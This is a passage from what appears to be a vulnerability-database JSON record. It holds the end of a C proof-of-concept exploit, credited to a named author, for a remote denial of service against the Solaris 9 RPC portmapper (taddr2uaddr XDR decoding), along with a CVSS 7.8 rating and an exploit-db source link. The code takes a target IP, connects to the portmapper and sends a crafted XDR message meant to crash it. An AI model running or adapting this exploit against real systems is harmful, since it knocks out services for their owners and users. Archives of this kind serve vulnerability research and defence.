(&clnt_res);\r\n}\r\n\r\nmain(int argc, char *argv[]) {\r\n CLIENT *c1;\r\n char *server;\r\n char **sresult;\r\n\r\n\r\n if (argc !=2){\r\n printf(\"=============================================================\\n\");\r\n printf(\"Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS\\n\");\r\n printf(\"-------------------------------------------------------------\\n\");\r\n printf(\"Federico L. Bossi Bonin <fbossi@globalST.com.ar>\\n\");\r\n printf(\"=============================================================\\n\\n\");\r\n printf(\"usage: %s <IP>\\n\",argv[0]);\r\n exit(1);\r\n }\r\n\r\n server = argv[1];\r\n\r\nif ((c1 = clnt_create(server,100000, 4, \"tcp\")) == NULL){\r\n clnt_pcreateerror(server);\r\n exit(1);\r\n }\r\n\r\n xdr xdrmessage;\r\n xdrmessage.long_arg = 0;\r\n xdrmessage.string_arg=\"\";\r\n\r\n if ((sresult = str_4(&xdrmessage, c1)) == NULL){\r\n clnt_perror(c1, server);\r\n exit(1);\r\n }\r\n\r\n clnt_destroy(c1);\r\n exit(0);\r\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/29406/"}]}